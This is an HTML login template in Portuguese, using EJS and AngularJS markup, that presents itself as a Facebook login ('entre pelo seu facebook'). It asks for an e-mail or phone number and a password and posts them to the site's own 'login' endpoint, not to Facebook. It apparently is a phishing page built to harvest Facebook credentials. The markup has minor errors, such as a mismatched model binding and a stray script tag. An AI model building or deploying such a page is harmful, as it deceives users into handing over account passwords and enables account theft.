<!DOCTYPE HTML>

<html ng-app="app" ng-controller="login">


    <head>
    <% include heads/face %>
   </head>
    <body>
    
        <h1>
            {{title}}<p class='material-icons'>book</p>
        </h1>
<br />
<br />
        <div id='login'  class="center">
<form method='post' action='login'>
        <label>
        <br/>
        
        <img class='icone' src='/img/fb.png'>
        <p>entre pelo seu facebook</p>
        <hr/>
        <br/><br />
        
        <p><b>e-mail ou telefone: </b></p>
        <input type='name' ng-model=user.name name='email' placeholder='insira seu e-mail ou Telefone' required>
        </label> 
         <br />  
<br />
<label>
        <p><b>senha: </b></p>
        <input type='password' ng-model=user.email name='pass' placeholder='insira sua senha' required>
        </label> 
         <br />  
         <br/>
        <label>
        </label>
        <hr>
        <br />
        
        <button type='submit'><b>entrar</b></button>
        <br/>
        <br/>
        <hr />
        </form>
        </div>
<script src='app.js'></script>
 </script>
    </body>
</html>
